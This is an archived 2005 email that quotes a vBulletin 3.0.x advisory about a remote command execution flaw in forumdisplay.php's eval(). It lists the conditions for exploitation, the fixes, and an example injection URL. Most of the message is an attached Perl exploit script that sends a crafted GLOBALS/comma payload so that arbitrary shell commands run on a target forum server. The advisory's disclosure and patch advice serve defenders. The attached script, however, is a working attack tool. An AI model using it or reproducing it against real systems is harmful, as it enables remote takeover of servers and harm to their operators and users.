------------iSebIhI8JWMnwN1IdOCb1t
Content-Type: text/plain; format=flowed; delsp=yes; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
Proof of concept
On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb@uk2.net> wrote:
>
>
> Vulnerable Systems:
> ----------------
> vBulletin version 3.0 up to and including version 3.0.4
>
> Immune systems:
> ----------------
> vBulletin version 3.0.5
> vBulletin version 3.0.6
>
> Vulnerable code in forumdisplay.php :
> ################################################## ###########
> if ($vboptions['showforumusers'])
> {
> .
> .
> .
> .
>
> if ($bbuserinfo['userid'])
> {
> .
> .
> .
> .
> $comma = ', ';
> }
> .
> .
> .
> .
> while ($loggedin = $DB_site->fetch_array($forumusers))
> {
> .
> .
> .
> eval('$activeusers .= "' . $comma .
> fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)
> $comma = ', ';
> .
> .
> }
> .
> .
> }
>
> ################################################## ###########
>
> Conditions:
> ----------------
> 1st condition : $vboptions['showforumusers'] == True , the admin must
> set
> showforumusers ON in vbulletin options.
> 2nd condition : $bbuserinfo['userid'] == 0 , you must be an
> visitor/guest
> .
> 3rd condition : $DB_site->fetch_array($forumusers) == True , when you
> visit the forums, it must has at least one user show the forum.
> 4th condition : magic_quotes_gpc must be OFF
> SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
> init.php by secret array GLOBALS[]=1 ;)))
>
>
> Solutions:
> ----------------
> * Disable showforumusers in vbulletin options .
> * add the next line before if ($vboptions['showforumusers'])
> $comma = '';
>
> Exploit:
> ----------------
> example :
> http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
------------iSebIhI8JWMnwN1IdOCb1t
Content-Disposition: attachment; filename=vbulletin304-xp.pl
Content-Type: application/octet-stream; name=vbulletin304-xp.pl
Content-Transfer-Encoding: 8bit
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!
use IO::Socket;
sub parse_url {
local($url) = @_;
if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}
if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : '/');
return ($protocol, $server, $port, $path);
}
return undef;
}
}
sub urlencode{
my($esc) = @_;
$esc =~ s/^\s+|\s+$//gs;
$esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
$esc =~ s/ /\+/g;
$esc =~ s/%20/\+/g;
return $esc;
}
$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);
$http_port = 80;
$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}";
@target = parse_url($url);
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";
$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;
------------iSebIhI8JWMnwN1IdOCb1t--